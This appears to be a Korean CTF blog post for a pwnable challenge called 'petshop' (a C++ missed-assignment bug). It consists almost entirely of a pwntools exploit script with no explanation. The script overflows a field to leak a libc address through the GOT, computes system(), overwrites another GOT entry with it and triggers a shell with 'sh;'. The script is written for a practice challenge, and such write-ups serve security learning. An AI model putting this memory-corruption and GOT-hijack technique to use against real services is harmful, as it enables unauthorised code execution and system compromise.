Category : Pwnables
petshopSummary : c++, value assign miss
Exploit
#!/usr/bin/python from pwn import * from struct import pack, unpack def c_set(s, name, sound, feed): s.sendline('4') # set # overflow for leak s.recvuntil('select for set:') s.sendline('1') # animal1 s.recvuntil('name:') s.sendline(name) s.recvuntil('sound:') s.sendline(sound) s.recvuntil('feed:') s.sendline(feed) def c_setname(s, person): s.sendline('6') # set name s.recvuntil('What\'s your name?') s.sendline(person) setvbuf_got = 0x604030 p = lambda x: pack("<Q", x) up = lambda x : unpack("<Q", x)[0] #s = process('./loader') s = remote('0', 7979) s.recvuntil('select:\n') s.sendline('1') # buy s.recvuntil('select:\n') s.sendline('1') # cat s.recvuntil('select:\n') s.sendline('1') # buy s.recvuntil('select:\n') s.sendline('1') # cat c_setname(s, 'a'*8) c_set(s, 'cat', 'meow', 'a'*12+(p(setvbuf_got)[:4])) s.recvuntil('select:\n') s.sendline('5') s.recvuntil('person:') leaked = up(s.recvline()[:-1]) libc_base = leaked - 0x71230 print 'libc base : ', hex(libc_base) system_libc = libc_base + 0x456a0 destring_got = 0x604068 command = 'sh;' c_set(s, 'cat', 'meow', 'a'*12+(p(destring_got)[:7])) c_setname(s, (p(system_libc)[:7])) c_set(s, 'cat', 'meow', 'a'*12+command) s.sendline('2') # sell s.interactive() |
'CTF > 2017' 카테고리의 다른 글
| HITB GSEC 2017 - babyqemu (0) | 2018.12.03 |
|---|---|
| XCTF FINAL 2017 - xmail (0) | 2018.10.06 |
| XCTF FINAL 2017 - network (0) | 2018.10.06 |
| CODEGATE 2017 QUAL - js_world (0) | 2018.09.26 |
| CODEGATE 2017 FINAL - Building Owner (0) | 2017.06.04 |
